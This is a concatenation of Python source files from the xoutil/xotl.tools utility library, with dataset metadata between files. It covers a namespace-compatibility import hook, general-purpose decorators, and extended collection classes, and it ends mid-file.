---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n'''Transition to a new namespace\n-----------------------------\n\nSince version 2.1, we're transitioning to another name: ``xotl.tools``. This\nis to align ``xoutil`` as a fundamental part of our family of projects under\nthe ``xotl`` namespace. *Xotl* is a Nahuatl word which may stand for\n'foundation'. ``xoutil`` is part of the foundation of many of our projects.\n\nBackwards compatible imports\n----------------------------\n\nSince 2.1, every module importable from ``xoutil`` is actually under the\nnamespace ``xotl.tools``; so importing, for instance, from\n``xoutil.future.datetime`` should be updated to\n`xotl.tools.future.datetime`:mod:.\n\nImporting from ``xoutil`` will still be possible in all versions before 3.0.\nYou won't have to change all your imports right away.\n\n\nDistribution of ``xoutil``\n--------------------------\n\nWill continue to distribute both `xotl.tools <xotl-tools-dist_>`__ and `xoutil\n<xoutil-dist_>`__ (with the same codebase) for the entire 2.1.x series. From\nversion 2.2.0+ will distruibute only ``xotl.tools``, but keep the backwards\nimport up to 3.0.\n\n.. warning:: Don't depend on both ``xoutil`` and ``xotl.tools``. We use the\n same codebase for both distributions; which means you'll get the same code,\n but if you install different versions you may get a crippled system.\n\n.. _xotl-tools-dist: https://pypi.org/project/xotl.tools\n.. _xoutil-dist: https://pypi.org/project/xoutil\n\n'''\n\nimport sys\nimport importlib\nfrom importlib.abc import MetaPathFinder\n\nXOUTIL_NAMESPACE = 'xoutil.'\nXOTL_TOOLS_NS = 'xotl.tools.'\n\n\nclass Hook(MetaPathFinder):\n def find_module(self, full_name, path=None):\n name = self._from_xoutil_to_xotl(full_name)\n if name:\n return self\n\n def _from_xoutil_to_xotl(self, full_name):\n if full_name.startswith(XOUTIL_NAMESPACE):\n path = full_name[len(XOUTIL_NAMESPACE):]\n return XOTL_TOOLS_NS + path\n else:\n return None\n\n def load_module(self, full_name):\n result = sys.modules.get(full_name, None)\n if result:\n return result\n modname = self._from_xoutil_to_xotl(full_name)\n result = None\n if modname:\n result = sys.modules.get(modname, None)\n if not result and modname:\n result = importlib.import_module(modname)\n if result:\n import warnings\n warnings.warn(\n ('Importing from xoutil ({}) is deprecated; '\n 'import from xotl.tools ({})').format(full_name, modname)\n )\n sys.modules[modname] = sys.modules[full_name] = result\n return result\n else:\n raise ImportError(modname)\n\n\n# I have to put this meta path before Python's standard, because otherwise\n# importing like this:\n#\n# from xoutil.future.datetime import TimeSpan\n#\n# First imports 'xoutil.future' with our Hook, but afterwards,\n# 'xoutil.future.datetime' is found by _frozen_importlib_external.PathFinder\n# instead of our own Hook which maintains 100% backwards compatibility of\n# imports.\nsys.meta_path.insert(0, Hook())\n" }, { "alpha_fraction": 0.573417067527771, "alphanum_fraction": 0.5766614079475403, "avg_line_length": 26.22222137451172, "blob_id": "ac25bec2ffbc47ecc341ec3ad44fba3d21392610", "content_id": "7239df3d4f8a3ec6b3537fa61ae1f495a13a8ea5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9556, "license_type": "no_license", "max_line_length": 86, "num_lines": 351, "path": "/xotl/tools/decorator/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Some useful decorators.\"\"\"\n\n# TODO: reconsider all this module\n\n\nimport sys\n\nfrom functools import wraps\nfrom types import FunctionType as function\n\nfrom xotl.tools.decorator.meta import decorator\n\n\n__all__ = (\n \"decorator\",\n \"AttributeAlias\",\n \"settle\",\n \"namer\",\n \"aliases\",\n \"assignment_operator\",\n \"instantiate\",\n \"memoized_instancemethod\",\n \"reset_memoized\",\n)\n\n\nclass AttributeAlias:\n \"\"\"Descriptor to create aliases for object attributes.\n\n This descriptor is mainly to be used internally by `aliases`:func:\n decorator.\n\n \"\"\"\n\n def __init__(self, attr_name):\n super().__init__()\n self.attr_name = attr_name\n\n def __get__(self, instance, owner):\n return getattr(instance or owner, self.attr_name)\n\n def __set__(self, instance, value):\n setattr(instance, self.attr_name, value)\n\n def __delete__(self, instance):\n delattr(instance, self.attr_name)\n\n\ndef settle(**kwargs):\n \"\"\"Returns a decorator to settle attributes to the decorated target.\n\n Usage::\n\n >>> @settle(name='Name')\n ... class Person:\n ... pass\n\n >>> Person.name\n 'Name'\n\n \"\"\"\n\n def inner(target):\n for attr in kwargs:\n setattr(target, attr, kwargs[attr])\n return target\n\n return inner\n\n\ndef namer(name, **kwargs):\n \"\"\"Like `settle`:func:, but '__name__' is a required positional argument.\n\n Usage::\n\n >>> @namer('Identity', custom=1)\n ... class I:\n ... pass\n\n >>> I.__name__\n 'Identity'\n\n >>> I.custom\n 1\n\n \"\"\"\n return settle(__name__=name, **kwargs)\n\n\ndef aliases(*names, **kwargs):\n \"\"\"In a class, create an `AttributeAlias`:class: descriptor for each\n definition as keyword argument (alias=existing_attribute).\n\n If \"names\" are given, then the definition context is looked and are\n assigned to it the same decorator target with all new names::\n\n >>> @aliases('foo', 'bar')\n ... def foobar(*args):\n ... 'This function is added to its module with two new names.'\n\n \"\"\"\n # FIX: This is not working in methods.\n def inner(target):\n \"\"\"Direct closure decorator that settle several attribute aliases.\"\"\"\n if kwargs:\n assert isinstance(target, type), '\"target\" must be a class.'\n if names:\n _locals = sys._getframe(1).f_locals\n for name in names:\n _locals[str(name)] = target\n if kwargs:\n for alias in kwargs:\n field = kwargs[alias]\n setattr(target, alias, AttributeAlias(field))\n return target\n\n return inner\n\n\n@decorator\ndef assignment_operator(func, maybe_inline=False):\n \"\"\"Makes a function that receives a name, and other args to get its first\n argument (the name) from an assignment operation, meaning that it if its\n used in a single assignment statement the name will be taken from the left\n part of the ``=`` operator.\n\n .. warning:: This function is dependant of CPython's implementation of the\n language and won't probably work on other implementations.\n Use only you don't care about portability, but use sparingly\n (in case you change your mind about portability).\n\n \"\"\"\n import inspect\n import ast\n\n if not isinstance(func, function):\n raise TypeError('\"func\" must be a function.')\n\n @wraps(func)\n def inner(*args):\n frm = sys._getframe(1)\n filename, line, funcname, src_lines, idx = inspect.getframeinfo(frm)\n try:\n sourceline = src_lines[idx].strip()\n parsed_line = ast.parse(sourceline, filename).body[0]\n assert maybe_inline or isinstance(parsed_line, ast.Assign)\n if isinstance(parsed_line, ast.Assign):\n assert len(parsed_line.targets) == 1\n assert isinstance(parsed_line.targets[0], ast.Name)\n name = parsed_line.targets[0].id\n elif maybe_inline:\n assert isinstance(parsed_line, ast.Expr)\n name = None\n else:\n assert False\n return func(name, *args)\n except (AssertionError, SyntaxError):\n if maybe_inline:\n return func(None, *args)\n else:\n return func(*args)\n finally:\n del filename, line, funcname, src_lines, idx\n\n return inner\n\n\n@decorator\ndef instantiate(target, *args, **kwargs):\n \"\"\"Some singleton classes must be instantiated as part of its declaration\n because they represents singleton objects.\n\n Every argument, positional or keyword, is passed as such when invoking the\n target. The following two code samples show two cases::\n\n >>> @instantiate\n ... class Foobar:\n ... def __init__(self):\n ... print('Init...')\n Init...\n\n\n >>> @instantiate('test', context={'x': 1})\n ... class Foobar:\n ... def __init__(self, name, context):\n ... print('Initializing a Foobar instance with name={name!r} '\n ... 'and context={context!r}'.format(**locals()))\n Initializing a Foobar instance with name='test' and context={'x': 1}\n\n In all cases, Foobar remains the class, not the instance::\n\n >>> Foobar # doctest: +ELLIPSIS\n <class '...Foobar'>\n\n \"\"\"\n target(*args, **kwargs)\n return target\n\n\n@decorator\ndef constant_bagger(func, *args, **kwds):\n \"\"\"Create a \"bag\" with constant values.\n\n Decorated object must be a callable, but the result will be a class\n containing the constant values.\n\n For example::\n\n >>> @constant_bagger\n ... def MYBAG():\n ... return dict(X=1, Y=2)\n\n It will generate::\n\n class MYBAG:\n X = 1\n Y = 2\n\n When called with arguments, these will be used as actual arguments for the\n decorated function::\n\n >>> @constant_bagger(X=1, Y=2)\n ... def MYBAG(**kwds):\n ... return kwds\n\n Constant bags are singletons that can be updated::\n\n >>> MYBAG(Z=3) is MYBAG\n True\n\n >>> MYBAG.Z\n 3\n\n \"\"\"\n from xotl.tools.objects import mass_setattr\n\n wraps = ((a, getattr(func, a, None)) for a in (\"__doc__\", \"__module__\"))\n attrs = {a: v for (a, v) in wraps if v}\n attrs.update(__new__=mass_setattr, **func(*args, **kwds))\n return type(func.__name__, (object,), attrs)\n\n\n@decorator\ndef singleton(target, *args, **kwargs):\n \"\"\"Instantiate a class and assign the instance to the declared symbol.\n\n Every argument, positional or keyword, is passed as such when invoking the\n target. The following two code samples show two cases::\n\n >>> @singleton\n ... class foobar:\n ... def __init__(self):\n ... self.doc = 'foobar instance'\n\n >>> foobar.doc\n 'foobar instance'\n\n >>> @singleton('test', context={'x': 1})\n ... class foobar:\n ... def __init__(self, name, context):\n ... self.name = name\n ... self.context = context\n\n >>> foobar.name, foobar.context\n ('test', {'x': 1})\n\n >>> isinstance(foobar, type)\n False\n\n \"\"\"\n res = target(*args, **kwargs)\n if isinstance(target, type):\n try:\n\n def __init__(*args, **kwds):\n msg = \"'{}' is a singleton, it can be instantiated only once\"\n raise TypeError(msg.format(target.__name__))\n\n target.__init__ = __init__\n except Exception:\n pass\n return res\n\n\nclass memoized_instancemethod:\n \"\"\"Decorate a method memoize its return value.\n\n Best applied to no-arg methods: memoization is not sensitive to\n argument values, and will always return the same value even when\n called with different arguments.\n\n This is extracted from the SQLAlchemy project's codebase, merit and\n copyright goes to SQLAlchemy authors::\n\n Copyright (C) 2005-2011 the SQLAlchemy authors and contributors\n\n This module is part of SQLAlchemy and is released under the MIT License:\n http://www.opensource.org/licenses/mit-license.php\n\n \"\"\"\n\n def __init__(self, fget, doc=None):\n from warnings import warn\n\n msg = '\"memoized_instancemethod\" is now deprecated and it will be ' \"removed.\"\n warn(msg, stacklevel=2)\n self.fget = fget\n self.__doc__ = doc or fget.__doc__\n self.__name__ = fget.__name__\n\n def __get__(self, obj, cls):\n if obj is None:\n return self\n\n def oneshot(*args, **kw):\n result = self.fget(obj, *args, **kw)\n memo = lambda *a, **kw: result\n memo.__name__ = self.__name__\n memo.__doc__ = self.__doc__\n obj.__dict__[self.__name__] = memo\n return result\n\n oneshot.__name__ = self.__name__\n oneshot.__doc__ = self.__doc__\n return oneshot\n\n\ndef reset_memoized(instance, name):\n from warnings import warn\n\n msg = (\n '\"reset_memoized\" is now deprecated and it will be '\n 'removed. Use \"memoized_property.reset\".'\n )\n warn(msg, stacklevel=2)\n instance.__dict__.pop(name, None)\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod(verbose=True)\n" }, { "alpha_fraction": 0.5017927885055542, "alphanum_fraction": 0.5077420473098755, "avg_line_length": 28.74318504333496, "blob_id": "8df9d313611d7304d7f9881f2721e1115b4e11f0", "content_id": "63f144d5d600ed722843aa1268ee5f1cff5e1595", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 62194, "license_type": "no_license", "max_line_length": 80, "num_lines": 2091, "path": "/xotl/tools/future/collections.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to Python's `collections` module.\n\nYou may use it as drop-in replacement of `collections`. Although we don't\ndocument all items here. Refer to `collections`:mod: documentation.\n\n\"\"\"\n\nfrom collections import * # noqa\n\ntry:\n from collections.abc import * # noqa\n from collections.abc import (\n Set,\n Iterable,\n Sized,\n Container,\n MutableSet,\n Mapping,\n MutableMapping,\n )\nexcept ImportError:\n from collections import (\n Set,\n Iterable,\n Sized,\n Container,\n MutableSet,\n Mapping,\n MutableMapping,\n )\n\n\nimport collections as _stdlib # noqa\nfrom collections import (\n _itemgetter,\n _heapq,\n _chain,\n _repeat, # noqa\n _starmap,\n _count_elements,\n)\n\nfrom xotl.tools.deprecation import deprecated # noqa\nfrom xotl.tools.symbols import Unset # noqa\nfrom xotl.tools.objects import SafeDataItem as safe # noqa\nfrom xotl.tools.reprlib import recursive_repr # noqa\n\n\nclass safe_dict_iter(tuple):\n \"\"\"Iterate a dictionary in a safe way.\n\n This is useful when a dictionary can be modified while iterating on it,\n for example::\n\n >>> d = {1: 2, 3: 4, 5: 6}\n >>> di = safe_dict_iter(d)\n\n >>> for k, v in di.items():\n ... d[v] = k\n\n >>> [(k, v) for (k, v) in di.items()]\n [(1, 2), (3, 4), (5, 6)]\n\n >>> del d[1]\n\n >>> [(k, v) for (k, v) in di.items()]\n [(3, 4), (5, 6)]\n\n >>> [k for k in di]\n [3, 5]\n\n \"\"\"\n\n def __new__(cls, mapping):\n self = super().__new__(cls, mapping)\n self._mapping = mapping\n return self\n\n def __str__(self):\n cls_name = type(self).__name__\n res = str(\", \").join(str(i) for i in self)\n return str(\"{}({})\").format(cls_name, res)\n\n __repr__ = __str__\n\n def __len__(self):\n return sum(1 for key in self)\n\n def __contains__(self, key):\n res = super().__contains__(key)\n return res and key in self.mapping\n\n def __nonzero__(self):\n return bool(len(self))\n\n __bool__ = __nonzero__\n\n def __iter__(self):\n for key in super().__iter__():\n if key in self._mapping:\n yield key\n\n keys = __iter__\n\n def values(self):\n for key in self:\n if key in self._mapping:\n yield self._mapping[key]\n\n def items(self):\n for key in self:\n if key in self._mapping:\n yield (key, self._mapping[key])\n\n\nclass defaultdict(_stdlib.defaultdict):\n \"\"\"A hack for ``collections.defaultdict`` that passes the key and a copy of\n self as a plain dict (to avoid infinity recursion) to the callable.\n\n Examples::\n\n >>> from xotl.tools.future.collections import defaultdict\n >>> d = defaultdict(lambda key, d: 'a')\n >>> d['abc']\n 'a'\n\n Since the second parameter is actually a dict-copy, you may (naively) do\n the following::\n\n >>> d = defaultdict(lambda k, d: d[k])\n >>> d['abc']\n Traceback (most recent call last):\n ...\n KeyError: 'abc'\n\n\n You may use this class as a drop-in replacement for\n ``collections.defaultdict``::\n\n >>> d = defaultdict(lambda: 1)\n >>> d['abc']\n 1\n\n \"\"\"\n\n def __missing__(self, key):\n if self.default_factory is not None:\n try:\n return self.default_factory(key, dict(self))\n except TypeError:\n # This is the error when the arguments are not expected.\n return super().__missing__(key)\n else:\n raise KeyError(key)\n\n\nclass OpenDictMixin:\n \"\"\"A mixin for mappings implementation that expose keys as attributes.\n\n For example:\n\n >>> from xotl.tools.objects import SafeDataItem as safe\n >>> class MyOpenDict(OpenDictMixin, dict):\n ... __slots__ = safe.slot(OpenDictMixin.__cache_name__, dict)\n\n >>> d = MyOpenDict({'es': 'spanish'})\n >>> d.es\n 'spanish'\n\n >>> d['es'] = 'espanol'\n >>> d.es\n 'espanol'\n\n When setting or deleting an attribute, the attribute name is regarded as\n key in the mapping if neither of the following condition holds:\n\n - The name is a `slot`.\n\n - The object has a ``__dict__`` attribute and the name is key there.\n\n This mixin defines the following features that can be redefined:\n\n ``_key2identifier``\n\n Protected method, receives a key as argument and must return a valid\n identifier that is used instead the key as an extended attribute.\n\n ``__cache_name__``\n\n Inner field to store a cached mapping between actual keys and\n calculated attribute names. The field must be always implemented as a\n `SafeDataItem` descriptor and must be of type `dict`. There are two\n ways of implementing this:\n\n - As a slot. The first time of this implementation is an example.\n Don't forget to pass the second parameter with the constructor\n `dict`.\n\n - As a normal descriptor::\n\n >>> from xotl.tools.objects import SafeDataItem as safe\n >>> class MyOpenDict(OpenDictMixin, dict):\n ... safe(OpenDictMixin.__cache_name__, dict)\n\n Classes or Mixins that can be integrated with `dict` by inheritance must\n not have a `__slots__` definition. Because of that, this mixin must not\n declare any slot. If needed, it must be declared explicitly in customized\n classed like in the example in the first part of this documentation or in\n the definition of `opendict` class.\n\n \"\"\"\n\n __cache_name__ = str(\"_inverted_cache\")\n\n def __dir__(self):\n \"\"\"Return normal \"dir\" plus valid keys as attributes.\"\"\"\n # TODO: Check if super must be called if defined\n from xotl.tools.objects import fulldir\n\n return list(set(~self) | fulldir(self))\n\n def __getattr__(self, name):\n from xotl.tools.future.inspect import get_attr_value\n\n _mark = object()\n res = get_attr_value(self, name, _mark)\n if res is not _mark:\n return res\n else:\n key = (~self).get(name)\n if key:\n return self[key]\n else:\n msg = \"'%s' object has no attribute '%s'\"\n raise AttributeError(msg % (type(self).__name__, name))\n\n def __setattr__(self, name, value):\n cls = type(self)\n desc = getattr(cls, name, None)\n if desc is not None: # Prioritize descriptors\n try:\n desc.__set__(self, value)\n except Exception:\n pass\n key = (~self).get(name)\n if key:\n self[key] = value\n else:\n super().__setattr__(name, value)\n\n def __delattr__(self, name):\n key = (~self).get(name)\n if key:\n del self[key]\n else:\n super().__delattr__(name)\n\n def __invert__(self):\n \"\"\"Return an inverted mapping between key and attribute names.\n\n Keys of the resulting dictionary are identifiers for attribute names\n and values are original key names.\n\n Class attribute \"__separators__\" are used to calculate it and is\n cached in '_inverted_cache slot safe variable.\n\n Several keys could have the same identifier, only one will be valid and\n used.\n\n To obtain this mapping you can use as the unary operator \"~\".\n\n \"\"\"\n KEY_LENGTH = \"length\"\n KEY_MAPPING = \"mapping\"\n cache = self._cache\n cached_length = cache.setdefault(KEY_LENGTH, 0)\n length = len(self)\n if cached_length != length:\n cache[KEY_LENGTH] = length\n aux = ((self._key2identifier(k), k) for k in self)\n res = {key: attr for key, attr in aux if key}\n cache[KEY_MAPPING] = res\n else:\n res = cache.get(KEY_MAPPING)\n if res is None:\n assert cached_length == 0\n res = {}\n cache[KEY_MAPPING] = res\n return res\n\n @property\n def _cache(self):\n from xotl.tools.future.inspect import get_attr_value\n\n try:\n return get_attr_value(self, type(self).__cache_name__)\n except AttributeError:\n res = setattr(self, type(self).__cache_name__, dict())\n return res\n\n @staticmethod\n def _key2identifier(key):\n \"\"\"Convert keys to valid identifiers.\n\n This method could be redefined in sub-classes to change this feature.\n This function must return a valid identifier or None if the conversion\n is not possible.\n\n \"\"\"\n # TODO: Improve this in order to obtain a full-mapping. For example,\n # the corresponding attribute names for the keys ``'-x-y'`` and\n # ``'x-y'`` are the same, in that case only one will be returning.\n from xotl.tools.keywords import suffix_kwd\n from xotl.tools.string import slugify\n from xotl.tools.validators import is_valid_identifier\n\n res = key if is_valid_identifier(key) else slugify(key, \"_\")\n return suffix_kwd(res)\n\n\nclass SmartDictMixin:\n \"\"\"A mixin that extends the `update` method of dictionaries\n\n Standard method allow only one positional argument, this allow several.\n\n Note on using mixins in Python: method resolution order is calculated in\n the order of inheritance, if a mixin is defined to overwrite behavior\n already existent, use first that classes with it. See `SmartDict`:class:\n below.\n\n \"\"\"\n\n def update(*args, **kwds):\n \"\"\"Update this dict from a set of iterables `args` and keyword values\n `kwargs`.\n\n Each positional argument could be:\n\n - another mapping (any object implementing \"keys\" and\n `~object.__getitem__`:meth: methods.\n\n - an iterable of (key, value) pairs.\n\n \"\"\"\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n for key, value in smart_iter_items(*args, **kwds):\n self[key] = value\n\n # TODO: Include new argument ``full=True`` to also search in string\n # values. Maybe this kind of feature will be better in a function\n # instead a method.\n def search(self, pattern):\n \"\"\"Return new mapping with items which key match a `pattern` regexp.\n\n This function always tries to return a valid new mapping of the same\n type of the caller instance. If the constructor of corresponding type\n can't be called without arguments, then look up for a class\n variable named `__search_result_type__` or return a standard\n Python dictionary if not found.\n\n \"\"\"\n from re import compile\n\n regexp = compile(pattern)\n cls = type(self)\n try:\n res = cls()\n except Exception:\n from xotl.tools.future.inspect import get_attr_value\n\n creator = get_attr_value(cls, \"__search_result_type__\", None)\n res = creator() if creator else {}\n for key in self:\n if regexp.search(key):\n res[key] = self[key]\n return res\n\n\nclass SmartDict(SmartDictMixin, dict):\n \"\"\"A \"smart\" dictionary that can receive a wide variety of arguments.\n\n See `SmartDictMixin.update`:meth: and :meth:`SmartDictMixin.search`.\n\n \"\"\"\n\n def __init__(*args, **kwargs):\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n super().__init__()\n self.update(*args, **kwargs)\n\n\nclass opendict(OpenDictMixin, dict):\n \"\"\"A dictionary implementation that mirrors its keys as attributes.\n\n For example::\n\n >>> d = opendict(es='spanish')\n >>> d.es\n 'spanish'\n\n >>> d['es'] = 'espanol'\n >>> d.es\n 'espanol'\n\n Setting attributes not already included *does not* makes them keys::\n\n >>> d.en = 'English'\n >>> set(d)\n {'es'}\n\n \"\"\"\n\n __slots__ = safe.slot(OpenDictMixin.__cache_name__, dict)\n\n @classmethod\n def from_enum(cls, enumclass):\n \"\"\"Creates an opendict from an enumeration class.\n\n If `enumclass` lacks the ``__members__`` dictionary, take the\n ``__dict__`` of the class disregarding the keys that cannot be `public\n identifiers\n <xotl.tools.validators.identifiers.is_valid_public_identifier>`:func:.\n If `enumclass` has the ``__members__`` attribute this is the same as\n ``opendict(enumclass.__members__)``.\n\n Example:\n\n .. code-block:: python\n\n >>> from xotl.tools.future.collections import opendict\n >>> @opendict.from_enum\n >>> class Foo:\n ... x = 1\n ... _y = 2\n\n >>> type(Foo) is opendict\n True\n\n >>> dict(Foo)\n {'x': 1}\n\n \"\"\"\n from xotl.tools.symbols import Unset\n from xotl.tools.validators.identifiers import is_valid_public_identifier\n\n members = getattr(enumclass, \"__members__\", Unset)\n if members is Unset:\n members = {\n k: v\n for k, v in enumclass.__dict__.items()\n if is_valid_public_identifier(k)\n }\n return cls(members)\n\n\nclass codedict(OpenDictMixin, dict):\n \"\"\"A dictionary implementation that evaluate keys as Python expressions.\n\n This is also a open dict (see `OpenDictMixin`:class: for more info).\n\n Example:\n\n >>> cd = codedict(x=1, y=2, z=3.0)\n >>> '{_[x + y]} is 3 -- {_[x + z]} is 4.0'.format(_=cd)\n '3 is 3 -- 4.0 is 4.0'\n\n It supports the right shift (``>>``) operator as a format operand (using\n ``_`` as the special name for the code dict):\n\n >>> cd >> '{_[x + y]} is 3 -- {_[x + z]} is 4.0 -- {x} is 1'\n '3 is 3 -- 4.0 is 4.0 -- 1 is 1'\n\n It also implements the left shift (``<<``) operator:\n\n >>> '{_[x + y]} is 3 -- {_[x + z]} is 4.0 -- {x} is 1' << cd\n '3 is 3 -- 4.0 is 4.0 -- 1 is 1'\n\n .. versionadded:: 1.8.3\n\n \"\"\"\n\n def __getitem__(self, key):\n try:\n return super().__getitem__(key)\n except KeyError:\n if isinstance(key, str):\n return eval(key, dict(self))\n else:\n raise\n\n def __rshift__(self, arg):\n return arg.format(_=self, **self)\n\n __rlshift__ = __rshift__\n\n\nclass StackedDict(OpenDictMixin, SmartDictMixin, MutableMapping):\n \"\"\"A multi-level mapping.\n\n A level is entered by using the `push`:meth: and is leaved by calling\n `pop`:meth:.\n\n The property `level`:attr: returns the actual number of levels.\n\n When accessing keys they are searched from the latest level \"upwards\", if\n such a key does not exists in any level a KeyError is raised.\n\n Deleting a key only works in the *current level*; if it's not defined there\n a KeyError is raised. This means that you can't delete keys from the upper\n levels without `popping <pop>`:func:.\n\n Setting the value for key, sets it in the current level.\n\n .. versionchanged:: 1.5.2 Based on the newly introduced `ChainMap`:class:.\n\n \"\"\"\n\n __slots__ = (\n safe.slot(\"inner\", ChainMap),\n safe.slot(OpenDictMixin.__cache_name__, dict),\n )\n\n def __init__(*args, **kwargs):\n # Each data item is stored as {key: {level: value, ...}}\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n self.update(*args, **kwargs)\n\n @property\n def level(self):\n \"\"\"Return the current level number.\n\n The first level is 0. Calling `push`:meth: increases the current\n level (and returns it), while calling `pop`:meth: decreases the\n current level (if possible).\n\n \"\"\"\n return len(self.inner.maps) - 1\n\n def push_level(self, *args, **kwargs):\n \"\"\"Pushes a whole new level to the stacked dict.\n\n :param args: Several mappings from which the new level will be\n initialled filled.\n\n :param kwargs: Values to fill the new level.\n\n :returns: The pushed `level`:attr: number.\n\n \"\"\"\n self.inner = self.inner.new_child()\n self.update(*args, **kwargs)\n return self.level\n\n @deprecated(push_level)\n def push(self, *args, **kwargs):\n \"\"\"Don't use thid method, use new `push_level`:meth: instead.\"\"\"\n return self.push_level(*args, **kwargs)\n\n def pop(self, *args):\n \"\"\"Remove this, always use original `MutableMapping.pop`:meth:.\n\n If none arguments are given, `pop_level`:meth: is called and a\n deprecation warning is printed in `sys.stderr` the first time. If one\n or two arguments are given, those are interpreted as (key, default)\n values of the super class `pop`:meth:.\n\n \"\"\"\n if len(args) == 0:\n cls = type(self)\n if not hasattr(cls, \"_bad_pop_called\"):\n import warnings\n\n setattr(cls, \"_bad_pop_called\", True)\n msg = (\n \"Use `pop` method without parameters is deprecated, \"\n \"use `pop_level` instead\"\n )\n warnings.warn(msg, stacklevel=2)\n return self.pop_level()\n else:\n return super().pop(*args)\n\n def pop_level(self):\n \"\"\"Pops the last pushed level and returns the whole level.\n\n If there are no levels in the stacked dict, a TypeError is raised.\n\n :returns: A dict containing the poped level.\n\n \"\"\"\n if self.level > 0:\n stack = self.inner\n res = stack.maps[0]\n self.inner = stack.parents\n return res\n else:\n raise TypeError(\"Cannot pop from StackedDict without any levels\")\n\n def peek(self):\n \"\"\"Peeks the top level of the stack.\n\n Returns a copy of the top-most level without any of the keys from\n lower levels.\n\n Example::\n\n >>> sdict = StackedDict(a=1, b=2)\n >>> sdict.push(c=3) # it returns the level...\n 1\n >>> sdict.peek()\n {'c': 3}\n\n \"\"\"\n return dict(self.inner.maps[0])\n\n def __str__(self):\n # TODO: Optimize\n return str(dict(self))\n\n def __repr__(self):\n return \"%s(%s)\" % (type(self).__name__, str(self))\n\n def __len__(self):\n return len(self.inner)\n\n def __iter__(self):\n return iter(self.inner)\n\n def __getitem__(self, key):\n return self.inner[key]\n\n def __setitem__(self, key, value):\n self.inner[key] = value\n\n def __delitem__(self, key):\n del self.inner[key]\n\n\nclass RankedDict(SmartDictMixin, dict):\n \"\"\"Mapping that remembers modification order.\n\n Differences with `OrderedDict`:class: are:\n\n - Can be ranked (change precedence order) at any time; see `rank`:meth:\n and `swap_ranks`:meth: methods for more information.\n\n - Based in modification, not in insertion order.\n\n - Keeps the standard semantics of Python for `popitem`:meth: method\n returning a random pair when called without parameters.\n\n \"\"\"\n\n def __init__(*args, **kwds):\n \"\"\"Initialize a ranked dictionary.\n\n The signature is the same as regular dictionaries, but keyword\n arguments are not recommended because their insertion order is\n arbitrary.\n\n Use `rank`:meth: to change the precedence order in any moment.\n\n \"\"\"\n from xotl.tools.params import issue_9137\n\n self, args = issue_9137(args)\n # Ensure direct calls to ``__init__`` don't clear previous contents\n try:\n self._ranks\n except AttributeError:\n self._ranks = []\n self.update(*args, **kwds)\n\n def rank(self, *keys):\n \"\"\"Arrange mapping keys into a systematic precedence order.\n\n :param keys: Variable number of key values, given are ordered in the\n highest precedence levels (0 is the most priority). Not given\n keys are added at the end in the its current order.\n\n \"\"\"\n if keys:\n ranks = []\n for key in keys:\n if key in self:\n ranks.append(key)\n else:\n raise KeyError(\"{}\".format(key))\n aux = set(keys)\n for key in self:\n if key not in aux:\n ranks.append(key)\n self._ranks = ranks\n\n def swap_ranks(self, *args, **kwds):\n \"\"\"Exchange ranks of given keys.\n\n :param args: Each item must be a pair of keys to exchange the order of\n precedence.\n\n :param kwds: Every keyword argument will have a pair to exchange\n (name, value).\n\n \"\"\"\n from xotl.tools.params import check_count\n\n check_count(len(args) + len(kwds) + 1, 2, caller=\"swap_ranks\")\n for key1, key2 in args:\n self._swap_ranks(key1, key2)\n for key1 in kwds:\n key2 = kwds[key1]\n self._swap_ranks(key1, key2)\n\n def move_to_end(self, key, last=True):\n \"\"\"Move an existing element to the end.\n\n Or move it to the beginning if ``last==False``.\n\n Raises KeyError if the element does not exist. When ``last==True``,\n acts like a fast version of ``self[key] = self.pop(key)``.\n\n .. note:: This method is kept for compatibility with\n `OrderedDict`:class:. Last example using ``self.pop(key)``\n works well in both, in OD and this class, but here in\n `RankedDict`:class: it's semantically equivalent to\n ``self[key] = self[key]``.\n\n \"\"\"\n try:\n ranks = self._ranks\n if last:\n if key != ranks[-1]:\n ranks.remove(key)\n ranks.append(key)\n else:\n if key != ranks[0]:\n ranks.remove(key)\n ranks.insert(0, key)\n except ValueError:\n raise KeyError(key)\n\n def _swap_ranks(self, key1, key2):\n \"\"\"Protected method to swap a pair of ranks.\"\"\"\n if key1 in self and key2 in self:\n ranks = self._ranks\n idx1, idx2 = ranks.index(key1), ranks.index(key2)\n if idx1 != idx2:\n aux = ranks[idx1]\n ranks[idx1] = ranks[idx2]\n ranks[idx2] = aux\n else:\n raise KeyError(\"{!r} and/or {!r}\".format(key1, key2))\n\n def __setitem__(self, key, value):\n \"\"\"rd.__setitem__(i, y) <==> rd[i]=y\"\"\"\n ranks = self._ranks\n if key in self:\n if ranks[-1] != key:\n ranks.remove(key)\n ranks.append(key)\n else:\n ranks.append(key)\n super().__setitem__(key, value)\n\n def __delitem__(self, key):\n \"\"\"rd.__delitem__(y) <==> del rd[y]\"\"\"\n super().__delitem__(key)\n self._ranks.remove(key)\n\n def __iter__(self):\n \"\"\"rd.__iter__() <==> iter(rd)\"\"\"\n return iter(self._ranks)\n\n def __reversed__(self):\n \"\"\"rd.__reversed__() <==> reversed(rd)\"\"\"\n return reversed(self._ranks)\n\n def clear(self):\n \"\"\"rd.clear() -> None. Remove all items from rd.\"\"\"\n super().clear()\n self._ranks = []\n\n def popitem(self, index=None):\n \"\"\"rd.popitem([index]) -> (key, value), return and remove a pair.\n\n :param index: Position of pair to return (default last). This method\n isn't have the same semantic as in `OrderedDict`:class: one,\n none the defined in method with the same name in standard\n Python mappings; here is similar to 